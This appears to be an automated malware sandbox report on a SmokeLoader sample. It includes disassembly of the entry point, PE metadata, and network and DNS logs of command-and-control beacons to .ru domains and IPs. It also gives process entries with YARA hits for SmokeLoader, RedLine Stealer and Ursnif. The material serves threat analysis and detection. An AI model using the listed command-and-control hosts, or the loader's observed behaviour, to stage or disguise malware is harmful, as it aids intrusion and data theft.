                          call 00007F8AE8BB088Bh
                          call 00007F8AE8BACDC6h
                          pop ebp
                          ret
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          mov edi, edi
                          push ebp
                          mov ebp, esp
                          push FFFFFFFEh
                          push 004245A8h
                          push 0040D160h
                          mov eax, dword ptr fs:[00000000h]
                          push eax
                          add esp, FFFFFF94h
                          push ebx
                          push esi
                          push edi
                          mov eax, dword ptr [004369D4h]
                          xor dword ptr [ebp-08h], eax
                          xor eax, ebp
                          push eax
                          lea eax, dword ptr [ebp-10h]
                          mov dword ptr fs:[00000000h], eax
                          mov dword ptr [ebp-18h], esp
                          mov dword ptr [ebp-70h], 00000000h
                          mov dword ptr [ebp-04h], 00000000h
                          lea eax, dword ptr [ebp-60h]
                          push eax
                          call dword ptr [004011F4h]
                          mov dword ptr [ebp-04h], FFFFFFFEh
                          jmp 00007F8AE8BACDD8h
                          mov eax, 00000001h
                          ret
                          mov esp, dword ptr [ebp-18h]
                          mov dword ptr [ebp-78h], 000000FFh
                          mov dword ptr [ebp-04h], FFFFFFFEh
                          mov eax, dword ptr [ebp-78h]
                          jmp 00007F8AE8BACF08h
                          mov dword ptr [ebp-04h], FFFFFFFEh
                          call 00007F8AE8BACF44h
                          mov dword ptr [ebp-6Ch], eax
                          push 00000001h
                          call 00007F8AE8BB28BAh
                          add esp, 04h
                          test eax, eax
                          jne 00007F8AE8BACDBCh
                          push 0000001Ch
                          call 00007F8AE8BACEFCh
                          add esp, 04h
                          call 00007F8AE8BB21B4h
                          test eax, eax
                          jne 00007F8AE8BACDBCh
                          push 00000010h
                          Programming Language:
                          • [ASM] VS2008 build 21022
                          • [ C ] VS2008 build 21022
                          • [IMP] VS2005 build 50727
                          • [C++] VS2008 build 21022
                          • [RES] VS2008 build 21022
                          • [LNK] VS2008 build 21022
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x24ccc0x3c.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x610000x57b8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x13400x1c.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x7e980x40.text
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x2f4.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x24e800x25000False0.4157582875844595data6.1472285177169095IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0x260000x3a6fc0x11a00False0.8917747118794326data7.602842922317191IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x610000x57b80x5800False0.6064453125data5.75323482911793IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountry
                          MIMELA0x649f80x2faASCII text, with very long lines (762), with no line terminatorsUzbekItaly
                          RT_CURSOR0x64d700x130Device independent bitmap graphic, 32 x 64 x 1, image size 0UzbekItaly
                          RT_CURSOR0x64ea00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0UzbekItaly
                          RT_CURSOR0x64f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0UzbekItaly
                          RT_ICON0x613800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0UzbekItaly
                          RT_ICON0x639280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0UzbekItaly
                          RT_STRING0x661a80x2dcMatlab v4 mat-file (little endian) u, numeric, rows 0, columns 0UzbekItaly
                          RT_STRING0x664880x14cdataUzbekItaly
                          RT_STRING0x665d80x1dedataUzbekItaly
                          RT_ACCELERATOR0x64d180x58dataUzbekItaly
                          RT_ACCELERATOR0x64cf80x20dataUzbekItaly
                          RT_GROUP_CURSOR0x660380x30dataUzbekItaly
                          RT_GROUP_ICON0x649d00x22dataUzbekItaly
                          RT_VERSION0x660680x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79UzbekItaly
                          DLLImport
                          KERNEL32.dllHeapWalk, GetNamedPipeHandleStateW, SystemTimeToFileTime, FillConsoleOutputCharacterW, CreateMailslotA, TerminateProcess, GetLastError, GetVersionExA, FreeResource, EnumResourceNamesA, FindNextFileA, CopyFileExW, BuildCommDCBW, SetDefaultCommConfigA, SetCommConfig, WritePrivateProfileStructW, LocalCompact, ChangeTimerQueueTimer, ReadConsoleInputW, WriteConsoleInputA, LoadResource, AddAtomW, SearchPathA, GetThreadTimes, CallNamedPipeW, GetDriveTypeW, BuildCommDCBAndTimeoutsW, VirtualProtect, GetModuleHandleA, GlobalAlloc, SetThreadIdealProcessor, GetProfileSectionW, DeleteFileW, FindFirstChangeNotificationA, VerifyVersionInfoA, FormatMessageA, SetDllDirectoryW, LoadLibraryA, WritePrivateProfileStringA, GetUserDefaultLCID, SetWaitableTimer, SetConsoleTextAttribute, InterlockedDecrement, GetStartupInfoW, GetSystemWow64DirectoryA, CopyFileW, SetCalendarInfoA, ContinueDebugEvent, EndUpdateResourceW, SetLastError, FreeLibraryAndExitThread, GetModuleFileNameW, FatalAppExitA, SetSystemTime, OpenFileMappingA, lstrcmpW, WriteFileGather, FlushConsoleInputBuffer, SetDefaultCommConfigW, FindNextVolumeA, InterlockedExchangeAdd, GlobalUnfix, GetSystemWindowsDirectoryA, CopyFileA, GetACP, GlobalFindAtomW, lstrcatW, GetPrivateProfileStringW, SetMailslotInfo, CreateActCtxW, GetPrivateProfileIntW, _lwrite, OutputDebugStringW, CreateNamedPipeW, GetAtomNameA, SetConsoleActiveScreenBuffer, EnumResourceTypesA, lstrlenA, DebugActiveProcess, WriteConsoleW, lstrcpyA, ReadConsoleOutputW, GetThreadContext, ReleaseActCtx, GetStringTypeA, GetPrivateProfileStringA, GetDriveTypeA, GetFileAttributesExA, LocalFileTimeToFileTime, MoveFileW, GetVolumePathNameA, GetCommMask, SetFileShortNameW, VerLanguageNameW, LockFile, ProcessIdToSessionId, GetQueuedCompletionStatus, AllocConsole, GlobalGetAtomNameW, SetComputerNameA, GetConsoleAliasExesLengthA, WriteConsoleInputW, CreateMailslotW, SystemTimeToTzSpecificLocalTime, MoveFileWithProgressA, GetStringTypeExW, EnumSystemLocalesA, GetPrivateProfileIntA, GetModuleHandleW, OpenWaitableTimerA, GetConsoleAliasesLengthW, PeekNamedPipe, FillConsoleOutputCharacterA, GetCompressedFileSizeA, FindNextVolumeMountPointA, WriteConsoleOutputCharacterA, QueryInformationJobObject, GetConsoleAliasExesA, EnumDateFormatsA, VirtualAllocEx, OpenMutexA, RaiseException, GetCommandLineA, GetStartupInfoA, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, Sleep, InterlockedIncrement, GetProcAddress, ExitProcess, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, HeapDestroy, HeapCreate, HeapFree, VirtualFree, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, GetOEMCP, GetCPInfo, IsValidCodePage, RtlUnwind, InitializeCriticalSectionAndSpinCount, DebugBreak, OutputDebugStringA, LoadLibraryW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CreateFileA, CloseHandle, FlushFileBuffers
                          ADVAPI32.dllInitiateSystemShutdownW
                          Language of compilation systemCountry where language is spokenMap
                          UzbekItaly
                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          192.168.2.437.140.192.15849695802851815 11/11/22-12:22:52.606242TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184969580192.168.2.437.140.192.158
                          TimestampSource PortDest PortSource IPDest IP
                          Nov 11, 2022 12:22:52.544603109 CET4969580192.168.2.437.140.192.158
                          Nov 11, 2022 12:22:52.605334044 CET804969537.140.192.158192.168.2.4
                          Nov 11, 2022 12:22:52.605485916 CET4969580192.168.2.437.140.192.158
                          Nov 11, 2022 12:22:52.606241941 CET4969580192.168.2.437.140.192.158
                          Nov 11, 2022 12:22:52.606261969 CET4969580192.168.2.437.140.192.158
                          Nov 11, 2022 12:22:52.667098999 CET804969537.140.192.158192.168.2.4
                          Nov 11, 2022 12:22:52.667165995 CET804969537.140.192.158192.168.2.4
                          Nov 11, 2022 12:22:52.695197105 CET804969537.140.192.158192.168.2.4
                          Nov 11, 2022 12:22:52.704159975 CET4969580192.168.2.437.140.192.158
                          Nov 11, 2022 12:22:52.704245090 CET4969580192.168.2.437.140.192.158
                          Nov 11, 2022 12:22:52.765021086 CET804969537.140.192.158192.168.2.4
                          Nov 11, 2022 12:22:52.784858942 CET804969537.140.192.158192.168.2.4
                          Nov 11, 2022 12:22:52.838620901 CET4969580192.168.2.437.140.192.158
                          Nov 11, 2022 12:22:52.868396044 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:52.923259974 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.923368931 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:52.923496962 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:52.977693081 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.992731094 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.992779970 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.992814064 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.992851019 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.992863894 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:52.992882967 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.992906094 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:52.992916107 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.992944002 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.992961884 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:52.992975950 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.993007898 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.993040085 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:52.993056059 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:52.993098974 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.047137022 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047171116 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047192097 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047213078 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047219038 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.047235012 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047272921 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.047683954 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047707081 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047719002 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047732115 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047748089 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047760963 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047774076 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047791958 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047808886 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047827959 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047846079 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047866106 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047885895 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047905922 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047905922 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.047924995 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.047971010 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.047996044 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.101689100 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.101737976 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.101768970 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.101795912 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.101821899 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.101825953 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.101851940 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.101852894 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.101903915 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.102078915 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.102113008 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.102140903 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.102164030 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.102190971 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.102327108 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.102737904 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.102777004 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.102808952 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.102834940 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.102838039 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.102902889 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.102921009 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.102952957 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103005886 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103035927 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103060007 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.103084087 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.103303909 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103338957 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103384972 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.103424072 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103457928 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103487968 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103502989 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.103517056 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103547096 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103574991 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103585958 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.103606939 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103621960 CET4969680192.168.2.480.76.42.141
                          Nov 11, 2022 12:22:53.103635073 CET804969680.76.42.141192.168.2.4
                          Nov 11, 2022 12:22:53.103652000 CET4969680192.168.2.480.76.42.141
                          TimestampSource PortDest PortSource IPDest IP
                          Nov 11, 2022 12:22:52.488261938 CET5657253192.168.2.48.8.8.8
                          Nov 11, 2022 12:22:52.525489092 CET53565728.8.8.8192.168.2.4
                          Nov 11, 2022 12:22:52.797280073 CET5091153192.168.2.48.8.8.8
                          Nov 11, 2022 12:22:52.867661953 CET53509118.8.8.8192.168.2.4
                          Nov 11, 2022 12:23:14.019974947 CET5968353192.168.2.48.8.8.8
                          Nov 11, 2022 12:23:14.055381060 CET53596838.8.8.8192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Nov 11, 2022 12:22:52.488261938 CET192.168.2.48.8.8.80x68Standard query (0)dindunketagestan.ruA (IP address)IN (0x0001)false
                          Nov 11, 2022 12:22:52.797280073 CET192.168.2.48.8.8.80xd0b3Standard query (0)kukaryka.ruA (IP address)IN (0x0001)false
                          Nov 11, 2022 12:23:14.019974947 CET192.168.2.48.8.8.80xc79cStandard query (0)telemetry.skype.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Nov 11, 2022 12:22:52.525489092 CET8.8.8.8192.168.2.40x68No error (0)dindunketagestan.ru37.140.192.158A (IP address)IN (0x0001)false
                          Nov 11, 2022 12:22:52.867661953 CET8.8.8.8192.168.2.40xd0b3No error (0)kukaryka.ru80.76.42.141A (IP address)IN (0x0001)false
                          Nov 11, 2022 12:23:14.055381060 CET8.8.8.8192.168.2.40xc79cName error (3)telemetry.skype.comnonenoneA (IP address)IN (0x0001)false
                          • rocmdbvx.com
                            • dindunketagestan.ru
                          • froxojju.net
                          • kukaryka.ru
                          • quvycqdb.org

                          Click to jump to process

                          Target ID:0
                          Start time:12:21:51
                          Start date:11/11/2022
                          Path:C:\Users\user\Desktop\cqu7x.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\cqu7x.exe
                          Imagebase:0x400000
                          File size:247296 bytes
                          MD5 hash:E449924B8AA04FA2E032511CF86D2482
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.415096817.0000000000510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.415328456.0000000000553000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.322194744.0000000000520000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          Target ID:1
                          Start time:12:21:58
                          Start date:11/11/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff618f60000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high

                          Target ID:4
                          Start time:12:22:52
                          Start date:11/11/2022
                          Path:C:\Users\user\AppData\Roaming\vcivdjd
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\vcivdjd
                          Imagebase:0x400000
                          File size:247296 bytes
                          MD5 hash:E449924B8AA04FA2E032511CF86D2482
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000003.459393089.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.471661867.0000000000513000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.471455998.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 92%, ReversingLabs
                          • Detection: 41%, Metadefender, Browse
                          Reputation:low

                          Target ID:5
                          Start time:12:22:53
                          Start date:11/11/2022
                          Path:C:\Users\user\AppData\Local\Temp\3196.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\3196.exe
                          Imagebase:0x660000
                          File size:177152 bytes
                          MD5 hash:969DB79BF21624D4135B30DF17777ABA
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 60%, ReversingLabs
                          • Detection: 0%, Metadefender, Browse
                          Reputation:low

                          Target ID:6
                          Start time:12:22:55
                          Start date:11/11/2022
                          Path:C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe"
                          Imagebase:0x400000
                          File size:37888 bytes
                          MD5 hash:F777E421EAB950176F802D8B92A50F7A
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.586624507.0000000000D39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 88%, ReversingLabs
                          Reputation:low

                          No disassembly